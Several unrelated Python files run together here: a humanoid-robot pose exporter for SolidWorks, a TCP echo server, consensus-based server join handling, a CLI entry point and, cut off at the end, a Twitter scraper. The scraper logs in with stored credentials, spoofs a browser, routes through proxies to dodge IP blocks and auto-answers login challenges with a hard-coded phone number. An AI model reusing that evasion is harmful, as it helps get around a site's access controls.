self.robot.viewer.gui.addFloor('hpp-gui/floor') size_q = np.shape(q)[0] if size_q == self.nq-7: torso_pose = np.array([0,0,0.5, 0,0,0,1]) q = np.hstack((torso_pose,q)) self.robot.display(q) def generateSwData(self, x): ''' This function is used to generate solidworks data type ''' q = np.asarray(x).copy() quat = q[3:7].copy() # Convert quaternion to rpy vector = np.matrix([0, 0, 0, quat[0], quat[1], quat[2], quat[3]]).T se3 = pinocchio.XYZQUATToSE3(vector) rpy = matrixToRpy(se3.rotation) q[3] = rpy[0] q[4] = rpy[1] q[5] = rpy[2] q[6] = 0 # Process unit, for distance convert m to mm # Process unit, for angle, convert radian to degree # print(q[0:3]) q[0] += 0.0264 q[1] += 0. q[2] += 0.50958 for i in range(3): q[i] *=1000. q[i] = np.abs(q[i]) for i in range(3, self.nq): q[i] *=180./np.pi if q[i] < 0: q[i] +=360. return q def saveEquation(self, x, savePath): ''' Legacy function This function is used to generate configuration file with Solidworks in "equation" interface ''' q = self.generateSwData(x) f = open(savePath, "w+") for i in range(self.nq): f.write('"q%d" = %f\r\n'%(i, q[i])) f.write('\n') names = [] names.append('"D1@q0_x"= "q0"\r\n') names.append('"D1@q1_y"= "q1"\r\n') names.append('"D1@q2_z"= "q2"\r\n') names.append('"D1@q3_x"= "q3"\r\n') names.append('"D1@q4_y"= "q4"\r\n') names.append('"D1@q5_z"= "q5"\r\n') names.append('"D1@q7_l_hip_y"= "q7"\r\n') names.append('"D1@q8_l_hip_r"= "q8"\r\n') names.append('"D1@q9_l_hip_p"= "q9"\r\n') names.append('"D1@q10_l_knee"= "q10"\r\n') names.append('"D1@q11_l_ankle_p"= "q11"\r\n') names.append('"D1@q12_l_ankle_r"= "q12"\r\n') names.append('"D1@q13_l_shoulder_p"= "q13"\r\n') names.append('"D1@q14_l_shoulder_r"= "q14"\r\n') names.append('"D1@q15_l_elbow"= "q15"\r\n') names.append('"D1@q16_r_hip_y"= "q16"\r\n') names.append('"D1@q17_r_hip_r"= "q17"\r\n') names.append('"D1@q18_r_hip_p"= "q18"\r\n') names.append('"D1@q19_r_knee"= "q19"\r\n') names.append('"D1@q20_r_ankle_p"= "q20"\r\n') names.append('"D1@q21_r_ankle_r"= "q21"\r\n') names.append('"D1@q22_r_shoulder_p"= "q22"\r\n') names.append('"D1@q23_r_shoulder_r"= "q23"\r\n') names.append('"D1@q24_r_elbow"= "q24"\r\n') for i in range(self.nq-1): f.write(names[i]) def saveConfig(self, x, savePath): ''' This function is used to generate configuration file with Solidworks in "configuration" interface ''' q = self.generateSwData(x) import xlsxwriter # Create a workbook and add a worksheet. workbook = xlsxwriter.Workbook(savePath) worksheet = workbook.add_worksheet() # Some data we want to write to the worksheet. jointName = [] jointName.append('D1@q0_x') jointName.append('D1@q1_y') jointName.append('D1@q2_z') jointName.append('D1@q3_x') jointName.append('D1@q4_y') jointName.append('D1@q5_z') jointName.append('null') jointName.append('D1@q7_l_hip_y') jointName.append('D1@q8_l_hip_r') jointName.append('D1@q9_l_hip_p') jointName.append('D1@q10_l_knee') jointName.append('D1@q11_l_ankle_p') jointName.append('D1@q12_l_ankle_r') jointName.append('D1@q13_l_shoulder_p') jointName.append('D1@q14_l_shoulder_r') jointName.append('D1@q15_l_shoulder_y') jointName.append('D1@q16_l_elbow') jointName.append('D1@q17_r_hip_y') jointName.append('D1@q18_r_hip_r') jointName.append('D1@q19_r_hip_p') jointName.append('D1@q20_r_knee') jointName.append('D1@q21_r_ankle_p') jointName.append('D1@q22_r_ankle_r') jointName.append('D1@q23_r_shoulder_p') jointName.append('D1@q24_r_shoulder_r') jointName.append('D1@q25_r_shoulder_y') jointName.append('D1@q26_r_elbow') q = q.tolist() # Start from the first cell. Rows and columns are zero indexed. row = 0 col = 0 from sets import Set inverse = Set(['D1@q20_r_knee', 'D1@q9_l_hip_p']) flip = Set(['D1@q10_l_knee', 'D1@q23_r_shoulder_p']) turn = Set(['D1@q15_l_shoulder_y']) # Iterate over the data and write it out row by row. for item, value in zip(jointName, q): if item in inverse: value = 360 -value if item in flip: value = 180 + value if item in turn: value = 90+value if item =='null': pass else: worksheet.write(row, col, item) worksheet.write(row+1, col, value) col += 1 workbook.close() def readConfig(self, filePath): ''' This function is used to read configuration file from Solidworks in "configuration" interface ''' import xlrd wb = xlrd.open_workbook(filePath) sheet = wb.sheet_by_index(0) joint_values = [] joint_names = [] from sets import Set inverse = Set(['D1@q20_r_knee', 'D1@q9_l_hip_p']) flip = Set(['D1@q10_l_knee', 'D1@q23_r_shoulder_p']) turn = Set(['D1@q15_l_shoulder_y']) row =0 col =0 for i in range(self.nq): if i ==6: joint_values.append(0) joint_names.append('null') else: name = sheet.cell_value(row, col) value = sheet.cell_value(row+1, col) if name in inverse: value = 360-value if name in flip: value = 180 + value if name in turn: value = 90 + value joint_names.append(name) joint_values.append(value) col +=1 for i in range(3, self.nq): if joint_values[i] > 180: joint_values[i] -=360 joint_values[i] *=np.pi/180. for i in range(3): joint_values[i] *=0.001 joint_values[0] -= 0.0264 joint_values[1] -= 0. joint_values[2] -= 0.50958 # Convert quaternion to rpy rpy = np.asarray(joint_values[3:6]) se3 = pinocchio.SE3.Identity() se3.translation = np.asarray(joint_values[0:3]) se3.rotation = rpyToMatrix(rpy) xyzquaternion = pinocchio.SE3ToXYZQUAT(se3).T.tolist()[0] joint_values[0:7] = xyzquaternion # print(joint_values) joint_values = np.asarray(joint_values) return joint_values def getLimit(self): u = [] l = [] # l_hip_y u.append(np.pi/2) # fore to inward l.append(-np.pi/6) # fore to outward # l_hip_r u.append(np.pi/4) #lift left l.append(-np.pi/4) #lift right # l_hip_p u.append(np.pi/2) #bend forward l.append(-np.pi/6) # bend backward # l_knee u.append(0) # bend forward impossible l.append(-np.pi/2-np.pi/10) # bend backward # l_ankle_p u.append(np.pi/6) # rear lift l.append(-np.pi/2)# fore lift # l_ankle_r u.append(np.pi/6) # lift right l.append(-np.pi/6)# lift left # l_shoulder_p u.append(np.pi/2) # arm backward l.append(-np.pi)# arm forward # l_shoulder_r u.append(np.pi) # arm left l.append(-np.pi/18)# arm right # l_shoulder_y u.append(np.pi) # elbow left l.append(-np.pi)# elbow right # l_elbow u.append(np.pi/2+np.pi/6) # elbow bend inward l.append(0)# elbow bend outward impossible # r_hip_y u.append(np.pi/6) # fore to outward l.append(-np.pi/2) # fore to inward # r_hip_r u.append(np.pi/4) #lift left l.append(-np.pi/4) #lift right # r_hip_p u.append(np.pi/2) #bend forward l.append(-np.pi/6) # bend backward # r_knee u.append(0) # bend forward impossible l.append(-np.pi/2-np.pi/10) # bend backward # r_ankle_p u.append(np.pi/6) # rear lift l.append(-np.pi/2)# fore lift # r_ankle_r u.append(np.pi/6) # lift right l.append(-np.pi/6)# lift left # r_shoulder_p u.append(np.pi/2) # arm backward l.append(-np.pi)# arm forward # r_shoulder_r u.append(np.pi) # arm right l.append(-np.pi/18)# arm left # r_shoulder_y u.append(2*np.pi) # elbow left l.append(-2*np.pi)# elbow right # r_elbow u.append(np.pi/2+np.pi/6) # elbow bend inward l.append(0)# elbow bend outward impossible return l, u def getVelLimit(self): velLower = [] velUpper = [] mx28=5.76 mx64=6.59 mx106=4.71 velLower.append(-1*mx64) velUpper.append(mx64) for i in range(5): velLower.append(-1*mx106) velUpper.append(mx106) for i in range(2): velLower.append(-1*mx64) velUpper.append(mx64) for i in range(2): velLower.append(-1*mx28) velUpper.append(mx28) velLower.append(-1*mx64) velUpper.append(mx64) for i in range(5): velLower.append(-1*mx106) velUpper.append(mx106) for i in range(2): velLower.append(-1*mx64) velUpper.append(mx64) for i in range(2): velLower.append(-1*mx28) velUpper.append(mx28) return velLower, velUpper def getTorqueLimit(self): torqueLower = [] torqueUpper = [] torqueLower.append(-6.0) torqueUpper.append(6.0) for i in range(5): torqueLower.append(-8.4) torqueUpper.append(8.4) for i in range(2): torqueLower.append(-6.0) torqueUpper.append(6.0) for i in range(2): torqueLower.append(-2.5) torqueUpper.append(2.5) torqueLower.append(-6.0) torqueUpper.append(6.0) for i in range(5): torqueLower.append(-8.4) torqueUpper.append(8.4) for i in range(2): torqueLower.append(-6.0) torqueUpper.append(6.0) for i in range(2): torqueLower.append(-2.5) torqueUpper.append(2.5) return torqueLower, torqueUpper class ReferenceState(): def __init__(self, state): self.state_names = [] self.state_names.append('x') self.state_names.append('y') self.state_names.append('z') self.state_names.append('rx') self.state_names.append('ry') self.state_names.append('rz') self.state_names.append('l_hip_y') self.state_names.append('l_hip_r') self.state_names.append('l_hip_p') self.state_names.append('l_knee') self.state_names.append('l_ankle_p') self.state_names.append('l_ankle_r') self.state_names.append('l_shoulder_p') self.state_names.append('l_shoulder_r') self.state_names.append('l_shoulder_y') self.state_names.append('l_elbow') self.state_names.append('r_hip_y') self.state_names.append('r_hip_r') self.state_names.append('r_hip_p') self.state_names.append('r_knee') self.state_names.append('r_ankle_p') self.state_names.append('r_ankle_r') self.state_names.append('r_shoulder_p') self.state_names.append('r_shoulder_r') self.state_names.append('r_shoulder_y') self.state_names.append('r_elbow') self.state_names.append('v_x') self.state_names.append('v_y') self.state_names.append('v_z') self.state_names.append('v_rx') self.state_names.append('v_ry') self.state_names.append('v_rz') self.state_names.append('v_l_hip_y') self.state_names.append('v_l_hip_r') self.state_names.append('v_l_hip_p') self.state_names.append('v_l_knee') self.state_names.append('v_l_ankle_p') self.state_names.append('v_l_ankle_r') self.state_names.append('v_l_shoulder_p') self.state_names.append('v_l_shoulder_r') self.state_names.append('v_l_shoulder_y') self.state_names.append('v_l_elbow') self.state_names.append('v_r_hip_y') self.state_names.append('v_r_hip_r') self.state_names.append('v_r_hip_p') self.state_names.append('v_r_knee') self.state_names.append('v_r_ankle_p') self.state_names.append('v_r_ankle_r') self.state_names.append('v_r_shoulder_p') self.state_names.append('v_r_shoulder_r') self.state_names.append('v_r_shoulder_y') self.state_names.append('v_r_elbow') self.reference_state = state.copy() self.stateWeights = np.array([0.] * 3 + [0.] * 3 + [0.01]*6 + [0.01]*4 + [0.01]*6 + [0.01] * 4 + [10.] * 26) self.config_id = {} self.weight_id = {} self.value = {} for i, (name) in enumerate(self.state_names): if i>5: j = i +1 else: j = i self.config_id[name] = j self.weight_id[name] = i self.value[name] = [np.asscalar(self.reference_state[j]), np.asscalar(self.stateWeights[i])] @property def value(self): return self._value # @property # def weight(self): # return self._weight def update(self): for name in self.state_names: config_id = self.config_id[name] weight_id = self.weight_id[name] self.reference_state[config_id] = self.value[name][0] self.stateWeights[weight_id] = self.value[name][1] def main(): VisualModel(display=True) if __name__ == "__main__": main()
multi_echo_server.py
#!/usr/bin/env python3 import socket import time from multiprocessing import Process HOST = "" PORT = 8001 BUFFER_SIZE = 1024 def main(): with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind((HOST, PORT)) s.listen(2) while True: conn, addr = s.accept() p = Process(target=handle_echo, args=(addr, conn)) p.daemon = True p.start() print("Started Proecss ", p) def handle_echo(addr, conn): print("Connected by", addr) full_data = conn.recv(BUFFER_SIZE) conn.sendall(full_data) conn.shutdown(socket.SHUT_RDWR) conn.close() if __name__ == "__main__": main()
announcements.py
import threading import base64 from nacl.signing import VerifyKey from src.components.server.processing.client_requests import ClientRequestsProcessing from src.core.election.election import Election from src.protocol.consensus.suspect import GroupViewSuspect from src.core.signatures.signatures import Signatures from src.protocol.group_view.join import JoinMsg, JoinRequest, JoinResponse from src.core.multicast.co_reliable_multicast import CausalOrderedReliableMulticast from src.core.multicast.to_reliable_multicast import TotalOrderedReliableMulticast from src.core.group_view.group_view import GroupView from src.core.utils.configuration import Configuration from src.core.utils.channel import Channel from src.core.broadcast.broadcast_listener import BroadcastListener from src.protocol.base import Message from src.core.unicast.sender import UnicastSender from src.core.consensus.phase_king import PhaseKing from src.protocol.election.announcement import ElectionAnnouncement from src.protocol.client.write.initial import * class AnnouncementProcessing: def __init__( self, announcement_channel: Channel, consensus_channel: Channel, announcement_multicast: TotalOrderedReliableMulticast, client_processing: ClientRequestsProcessing, phase_king: PhaseKing, group_view: GroupView, configuration: Configuration, ): self._channel = announcement_channel self._consensus_channel = consensus_channel self._to_multicast = announcement_multicast self._client_processing = client_processing self._phase_king = phase_king self._group_view = group_view self._configuration = configuration self._signature = Signatures(group_view.sk, group_view.identifier) self._udp_sender = UnicastSender(self._configuration) self._election = Election(phase_king, group_view, configuration) def start(self): consumer_thread = threading.Thread(target=self.consumer) consumer_thread.start() def consumer(self): while True: data = self._channel.consume() self._process_request(data) def _process_request(self, data): msg = Message.initFromJSON(data) msg.decode() if "View: Join Message" == msg.header: self._process_join(data) elif "Election: Announcement" == msg.header: self._process_election() elif "Client: Join Message" == msg.header: self._process_client_init(data) def _process_join(self, data): join_msg = JoinMsg.initFromJSON(data) join_msg.decode() join_request = JoinRequest.initFromJSON(join_msg.request) join_request.decode() # run phaseking algorithm on shortened data pk_string = base64.b64encode(join_request.pk.encode()).decode("ascii") shortened_data = "{}#{}#{}#{}".format( join_request.identifier, pk_string, join_request.ip_addr, join_request.port ) shortened_data = self._phase_king.consensus(shortened_data) data = shortened_data.split("#") if len(data) != 4: return pk = VerifyKey(base64.b64decode(data[1])) # this allows the new server to send nacks and consume the storage of to-multicast self._group_view.add_server(data[0], pk, data[2], int(data[3])) # verify signatures requires that the new server is added to the group view. If invalid, we simply suspend the server again # note that, due to the phaseking algorithm before, all honest servers suspend the server if at least one honest server does so if not join_request.verify_signature(self._signature, self._group_view.pks): self._group_view.suspend_server(join_request.identifier) return # notify the new server that we halted further delivery and sending response = JoinResponse.initFromData("waiting") success = self._udp_sender.send_udp_sync(response, (data[2], int(data[3]))) if not success: suspect_msg = GroupViewSuspect.initFromData(join_request.identifier, "JOIN: {}".format(join_request.identifier)) suspect_msg.encode() self._to_multicast.send(suspect_msg, True) return # halt delivery and sending self._to_multicast.halt_multicast(join_request.identifier) def _process_election(self): consented_value = self._phase_king.consensus("election") if consented_value == "election": self._election.election() def _process_client_init(self, data): init_msg = TOInitMsg.initFromJSON(data) init_msg.decode() msg = InitMessage.initFromJSON(init_msg.request) msg.decode() pk_string = base64.b64encode(msg.pk.encode()).decode("ascii") consistent_pk = self._phase_king.consensus("client-init#"+pk_string) if "#" in consistent_pk: self._client_processing._posthook_client_init(init_msg.request, consistent_pk.split("#")[1])
main.py
#!/usr/bin/env python import sys, argparse from threading import Thread from DocuTrace.Analysis.ComputeData import ComputeData from DocuTrace.Analysis.DataCollector import DataCollector from DocuTrace.Utils.Logging import logger from DocuTrace.Utils.Validation import str2bool, validate_path, validate_task from DocuTrace.Utils.Exceptions import InvalidPathError, InvalidTaskIDError from DocuTrace.Utils.Tasks import tasks def main(): run(parse_args()) def run(args): try: verbosity = args.verbose logger.setLevel(verbosity) logger.info('Verbosity set to display info messages.') logger.debug('Verbosity set to display debug messages.') path = validate_path(args.filepath) data_collector = DataCollector(path) load = Thread(target=process_file, args=(data_collector,), daemon=True) load.start() task = validate_task(args.task_id) tasks(data_collector, load, task, args) print('Sucess!') except InvalidPathError as e: logger.exception(e) sys.exit(1) except InvalidTaskIDError as e: logger.exception(e) sys.exit(1) except Exception as e: logger.exception(e) sys.exit(1) def parse_args(): """Parse the args provided to this namespace usage: ``main.py [-h] [-u USER_UUID] [-d DOC_UUID] [-t TASK_ID] -f FILEPATH [-n [LIMIT_DATA]] [-v [VERBOSE]] [-e [EXIT_EARLY]]`` **Command line interface for DocuTrace.** optional arguments: -h, --help show this help message and exit Core parameters: -u USER_UUID, --user_uuid USER_UUID Specifies the user uuid -d DOC_UUID, --doc_uuid DOC_UUID Specifies the document uuid -t TASK_ID, --task_id TASK_ID Specifies the task id -f FILEPATH, --filepath FILEPATH Specifies the file name Secondary parameters: -n LIMIT_DATA, --limit_data LIMIT_DATA Limits the number of displayed data points for tasks 2a, 2b, 3a, 3b, 4d, and 5. -v VERBOSE, --verbose VERBOSE Set the verbosity level, 20 for INFO, 10 for DEBUG. Default is 30: WARN -e EXIT_EARLY, --exit_early EXIT_EARLY Exit the program after running only the specified task. Returns: ArgumentParser: Parsed arguments """ parser = argparse.ArgumentParser(description='Command line interface for DocuTrace.') args = parser.add_argument_group('Core parameters') args.add_argument('-u', '--user_uuid', help='Specifies the user uuid', required=False, default=None, type=str) args.add_argument('-d', '--doc_uuid',help='Specifies the document uuid', required=False, default=None, type=str) args.add_argument('-t', '--task_id', help='Specifies the task id', required=False, type=str) args.add_argument('-f', '--filepath', help='Specifies the file name', required=True, type=str) secondary_args = parser.add_argument_group('Secondary parameters') secondary_args.add_argument('-n', '--limit_data', help='Limits the number of displayed data points for tasks 2a, 2b, 3a, 3b, 4d, and 5.', type=int, required=False, default=None, const=20, nargs='?') secondary_args.add_argument('-v', '--verbose', type=int, required=False, default=30, nargs='?', const=20, help='Set the verbosity level, 20 for INFO, 10 for DEBUG. Default is 30: WARN') secondary_args.add_argument('-e', '--exit_early', type=str2bool, default=True, const=False, nargs='?', help='Continue the program after running only the specified task.') return parser.parse_args() def process_file(data_collector): """Begin processing this file. """ data_collector.gather_data() if __name__ == "__main__": sys.exit(main() or 0)
tweets.py
import csv # To read & write Comma Seperated Value files import json # To encode python objects to json import os import re # For regular expressions import sys import time # To manipulate time values import warnings from datetime import datetime # To parse datetime types from multiprocessing import Process, Queue # Analogous to threading but uses processes & provides simple API for dummy subpackage from multiprocessing.dummy import Lock from multiprocessing.dummy import Pool as ThreadPool from multiprocessing.dummy import Queue as ThreadQueue from pprint import pprint # To pretty print different data structures in python import requests from dateutil import parser as dateparser from openpyxl import load_workbook import settings import sqlalchemy.exc from pyquery import PyQuery from sqlalchemy import * from sqlalchemy import event, exc from sqlalchemy.ext.declarative import declarative_base from sqlalchemy.orm import relationship, scoped_session, sessionmaker time_wait = 0 flag1 = False """ REGEX => https://github.com/praritlamba/Mining-Twitter-Data-for-Sentiment-Analysis/blob/master/README.md """ emoticons_str = r""" (?: [:=;] # Eyes [oO\-]? # Nose (optional) [D\)\]\(\]/\\OpP] # Mouth )""" regex_str = [ emoticons_str, r'<[^>]+>', # HTML tags r'(?:@[\w_]+)', # @-mentions r"(?:\#+[\w_]+[\w\'_\-]*[\w_]+)", # hash-tags r"(?:\$+[a-zA-Z]+[\w\'_\-]*[\w_]+)", # cash-tags r'http[s]?://(?:[a-z]|[0-9]|[$-_@.&amp;+]|[!*\(\),]|(?:%[0-9a-f][0-9a-f]))+', # URLs r'(?:(?:\d+,?)+(?:\.?\d+)?)', # numbers r"(?:[a-z][a-z'\-_]+[a-z])", # words with - and ' r'(?:[\w_]+)', # other words r'(?:\S)' # anything else ] tokens_re = re.compile(r'(' + '|'.join(regex_str) + ')', re.VERBOSE | re.IGNORECASE) emoticon_re = re.compile(r'^' + emoticons_str + '$', re.VERBOSE | re.IGNORECASE) class LoadingError(Exception): pass # Get tweets class Twit: def __init__(self): pass def json(self): return {'date': self.unixtime, 'text': self.text, 'screen_name': self.screen_name, 'user_name': self.user_name, 'user_id': self.user_id, 'id': self.id, 'retweets_count': self.retweets_count, 'favorites_count': self.favorites_count, 'permalink': self.permalink, 'urls': self.urls, 'mentions': self.mentions, 'hashtags': self.hashtags, 'is_retweet': self.is_retweet, 'symbols': self.symbols, 'is_protected': self.is_protected} def __repr__(self): return self.text class Page(object): """Starts a requests session with twitter.""" def __init__(self, proxy=None): self.pr = { 'http': proxy, 'https': proxy } # for sending request using proxy, if twitter blocks your current ip self.timeout = 30 # timeout request if not getting response till 30 seconds self.ses = requests.Session() # starting a session, so we could persist certain parameters across requests # using dict for sending some headers in our request self.ses.headers = { 'user-agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36', 'Connection': 'keep-alive', 'Cache-Control': 'max-age=0', 'Accept-Encoding': 'gzip, deflate, sdch, br', # 'accept': 'application/json, text/javascript, */*; q=0.01', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'en-US;q=0.6,en;q=0.4', 'x-compress': 'null', 'Upgrade-Insecure-Requests': '1', # 'x-requested-with': 'XMLHttpRequest', # 'x-twitter-active-user': 'yes', 'host': 'twitter.com' } def __del__(self): self.ses.close() def close(self): """ Close the session. :return: """ self.ses.close() def load(self, url, params=None, headers=None, important=True): """Returns request content after getting response from given url & params(GET), headers and timeout args.""" error_count = 0 # counting request failures while True: try: resp = self.ses.get(url, proxies=self.pr, params=params, headers=headers, timeout=self.timeout) except requests.exceptions.RequestException as e: error_count += 1 # print('Loading error', error_count, pr, e) if error_count < 3: print('Loading error', error_count, url, self.pr, e) time.sleep(60) continue print('Error limit exceeded Loading error', url, self.pr, e) if important: raise LoadingError else: return None # showing different error messages depending upon different status_code(s), if request was important enough then raise LoadingError(Exception) if resp.status_code == requests.codes.ok: return resp.text elif resp.status_code == 404: print('Error 404', url, resp.text, resp.status_code) if important: raise LoadingError else: return None elif resp.status_code == 429: print('Rate limit. Sleep 3 min') time.sleep(3 * 60) continue elif resp.status_code == 503: # print('503 Error waiting 2 min', screen_name, proxy, url, resp.text, resp.status_code) error_count += 1 if error_count > 5: print('AWAM: Requestes 503 error', url, self.pr) if important: raise LoadingError else: return None print(' Requestes 503 error', error_count, url, self.pr) time.sleep(120) continue else: print('Error', url, resp.text, resp.status_code) error_count += 1 print('Loading error', error_count) if error_count > 5: print('Error limit exceeded Requestes error ', url, self.pr, resp.status_code) if important: raise LoadingError else: return None print('Error waiting 1 min', url, resp.text, resp.status_code) time.sleep(60) continue def twitter_login(page, login, password): """Function for twitter login.""" resp = page.load('https://twitter.com/') res = re.findall('<input type="hidden" value="(.+?)" name="authenticity_token">', resp) # getting authenticity_token, just like csrf_token in django for verifying request token = res[0] params = {'session[username_or_email]': login, 'session[password]': password, 'remember_me': '1', 'return_to_ssl': 'true', 'scribe_log': '', 'redirect_after_login': '/', 'authenticity_token': token} url = 'https://twitter.com/sessions' while True: resp = page.ses.post(url, data=params, timeout=10) if resp.status_code == requests.codes.ok: if re.search('action="/logout" method="POST">', resp.text): print('Logged as', login) res = re.findall('<input type="hidden" value="(.+?)" name="authenticity_token', resp.text) token = res[0] return token elif re.search('Your account appears to have exhibited automated behavior that violates', resp.text): print('Your account appears to have exhibited automated behavior that violates') print('Pass a Google reCAPTCHA challenge.Verify your phone number') return False elif re.search('id="login-challenge-form"', resp.text): authenticity_token = re.findall('name="authenticity_token" value="(.+?)"/>', resp.text, re.S)[0] challenge_id = re.findall('name="challenge_id" value="(.+?)"/>', resp.text, re.S)[0] user_id = re.findall('name="user_id" value="(.+?)"/>', resp.text, re.S)[0] challenge_type = re.findall('name="challenge_type" value="(.+?)"/>', resp.text, re.S)[0] platform = re.findall('name="platform" value="(.+?)"/>', resp.text, re.S)[0] params = { 'authenticity_token': authenticity_token, 'challenge_id': challenge_id, 'user_id': user_id, 'challenge_type': challenge_type, 'platform': platform, 'redirect_after_login': '/', 'remember_me': 'true', 'challenge_response': '+1-812-679-7792'} url = 'https://twitter.com/account/login_challenge' print(challenge_type) continue elif re.search('You have initiated too many login verification requests', resp.text, re.S): print('You have initiated too many login verification requests') global time_wait print(time_wait) time_wait = time.time() raise LoadingError else: print('Not logged as', login) return False break else: print('Login Error', resp.status_code) return False # resp = page.ses.post('https://twitter.com/sessions', data=params, timeout=10) # # if re.search('action="/logout" method="POST">', resp.text): # print('Logged as', login) # # res = re.findall('<input type="hidden" value="(.+?)" name="authenticity_token', resp.text) # token = res[0] # return token # else: # print('Not logged as', login) # return None def get_new_search(page, query, login=None, password=None, nativeretweets=False): """Searches for given query and returns a list of all tweets found.""" user_name = query[0] query_string = query[1] data_begin = query[2] data_end = query[3] refreshCursor = '' h = {'x-requested-with': 'XMLHttpRequest', 'x-twitter-active-user': 'yes', 'accept': 'application/json, text/javascript, */*; q=0.01'} params = {} # if we want to scrape our own tweets, first login then start scraping if settings.PROFILE_SEARCH: refreshCursor = '999992735314882560' token = twitter_login(page, settings.TWITTER_USERNAME, settings.TWITTER_PASSWORD) if not token: print('UNABLE LOGIN') return False empty_count = 0 date_range_change_count = 0 while True: if settings.PROFILE_SEARCH: url = 'https://twitter.com/i/profiles/show/' + query_string + '/timeline/with_replies' params['include_available_features'] = '1' params['include_entities'] = '1' params['reset_error_state'] = 'false' else: url = 'https://twitter.com/i/search/timeline' params['include_available_features'] = '1' params['include_entities'] = '1' params['reset_error_state'] = 'false' params['vertical'] = 'default' params['src'] = 'typd' params['f'] = 'tweets' params['lang'] = 'en' params['q'] = ' ' + query_string + ' since:' + data_begin + ' until:' + data_end params['max_position'] = refreshCursor resp = page.load(url, params=params, headers=h) try: r = json.loads(resp) except: print(resp.text) print('JSON error', url, page.pr) raise LoadingError if not r.get('inner', False): r['inner'] = r try: refreshCursor = r['inner']['min_position'] except KeyError: print(resp.text) print('Key error', url, page.pr) raise LoadingError if not refreshCursor: break if not re.sub('[\n ]', '', r['inner']['items_html']): empty_count += 1 if empty_count > 3: if data_current > data_begin: print('Reduce date range') date_range_change_count += 1 if date_range_change_count < 3: data_end = data_current empty_count = 0 continue break else: # print(r['inner']['new_latent_count']) print('Twitter server stopped. sleep 3 sec') time.sleep(3) continue empty_count = 0 date_range_change_count = 0 r = r['inner']['items_html'] for tweet in cont(page, r, query_string): if tweet: data_current = re.sub(' \d+:\d+:\d+', '', str(tweet.date)) yield tweet page.close() # Content parser def cont(page, r, query_string): r = re.sub('</span><span class="invisible">', '', r) try: tweets = PyQuery(r)('div.js-stream-tweet') # print(tweets.html()) except: print('no div.js-stream-tweet') return None for tweetHTML in tweets: # pprint(tweetHTML) tweet = Twit() # tweet.c = user_tweet_count tweetPQ = PyQuery(tweetHTML) # pprint(tweetPQ) tweet.time_zone = '' # time_zone res = re.findall('twitter-cashtag pretty-link js-nav" dir="ltr"><s>\$</s><b>(?:<strong>)?(.+?)</', str(tweetPQ), re.M) tweet.symbols = [] if res: res = list(set(res)) for rt in res: if '$' + rt.upper() != query_string.upper(): tweet.symbols.append('$' + rt.upper()) else: tweet.symbols = [] # print(PyQuery(tweetHTML)('a.twitter-timeline-link')) tweet.urls = [] flag = False for aa in PyQuery(tweetHTML)('a.twitter-timeline-link'): aaa = PyQuery(aa) if aaa.attr('data-expanded-url') and aaa.attr('data-expanded-url') != 'null' and aaa.attr( 'data-expanded-url') != 'None': tweet.urls.append(aaa.attr('data-expanded-url')) flag = True # print(tweetPQ("p.js-tweet-text").text()) else: tweet.urls.append(aaa.attr('href')) # print(aaa.attr('href'),'https://'+aaa.text()) aaa.remove() # print(tweetPQ("p.js-tweet-text").text()) # if flag: # raise LoadingError tweet.mentions_name = [] tweet.mentions_id = [] tweet.ment_s = [] for aa in PyQuery(tweetHTML)('a.twitter-atreply'): aaa = PyQuery(aa) # mention={'screen_name':aaa.attr('href').replace('/',''),'id':aaa.attr('data-mentioned-user-id')} tweet.ment_s.append((aaa.attr('href').replace('/', ''), aaa.attr('data-mentioned-user-id'))) tweet.mentions_name.append(aaa.attr('href').replace('/', '')) tweet.mentions_id.append(aaa.attr('data-mentioned-user-id')) usernameTweet = tweetPQ.attr("data-screen-name") t = tweetPQ("p.js-tweet-text").text().replace('# ', '#').replace('@ ', '@').replace('http:// ', 'http://').replace( 'http://www. ', 'http://www.').replace('https://www. ', 'https://www.').replace('https:// ', 'https://') e = tweetPQ('img.Emoji') tweet.emoji = [] for em in e: tweet.emoji.append(str(PyQuery(em).attr('aria-label').replace('Emoji: ', ''))) # if DEBUG: # print(tweet.emoji) txt = re.sub(r"\s+", " ", t); txt = re.sub('\$ (?P<s>[A-Z]{1,6}([._][A-Z]{1,2})?)', '$\g<s>', txt) if not re.search('<strong class="fullname">Tweet withheld</strong>', str(tweetPQ), re.M): try: retweets = int(tweetPQ("span.ProfileTweet-action--retweet span.ProfileTweet-actionCount").attr( "data-tweet-stat-count").replace(",", "")); except AttributeError: print(str(tweetPQ)) print('Attribute error in ProfileTweet-action--retweet') retweets = 0 favorites = int(tweetPQ("span.ProfileTweet-action--favorite span.ProfileTweet-actionCount").attr( "data-tweet-stat-count").replace(",", "")); replyes = int(tweetPQ("span.ProfileTweet-action--reply span.ProfileTweet-actionCount").attr( "data-tweet-stat-count").replace(",", "")); dateSec = int(tweetPQ("small.time span.js-short-timestamp").attr("data-time")); if tweetPQ.attr('data-protected') == 'true': tweet.is_protected = True else: tweet.is_protected = False id = tweetPQ.attr("data-tweet-id") permalink = tweetPQ.attr("data-permalink-path") tweet.user_id = tweetPQ.attr('data-user-id') tweet.id = id tweet.permalink = 'https://twitter.com' + permalink tweet.screen_name = usernameTweet tweet.user_name = tweetPQ.attr('data-name') txt = re.sub('(?:https\://)|(?:http\://)', '', txt) # txt = re.sub('https\:\/\/', '', txt) # txt=re.sub('http\:\/\/','',txt) tweet.text = txt tweet.unixtime = dateSec tweet.date = datetime.fromtimestamp(dateSec) tweet.retweets_count = retweets tweet.favorites_count = favorites tweet.replyes_count = replyes # tweet.mentions = re.compile('(@\\w*)').findall(tweet.text) tweet.mentions = re.compile('(?:@[\w_]+)').findall(tweet.text) # tweet.hashtags = re.compile('(#\\w*)').findall(tweet.text) tweet.hashtags = re.compile('(?:\#+[\w_]+[\w\'_\-]*[\w_]+)').findall(tweet.text) tweet.geo = {} if tweetPQ.attr('data-retweeter'): tweet.is_retweet = True tweet.retweet_user_id = tweetPQ.attr('data-user-id') tweet.retweet_id = tweetPQ.attr('data-retweet-id') else: tweet.is_retweet = False tweet.lang = tweetPQ("p.js-tweet-text").attr("lang") tweet.is_reply = tweetPQ.attr("data-is-reply-to") tweet.data_conversation_id = tweetPQ.attr("data-conversation-id") if tweet.is_reply: tweet.is_reply = True 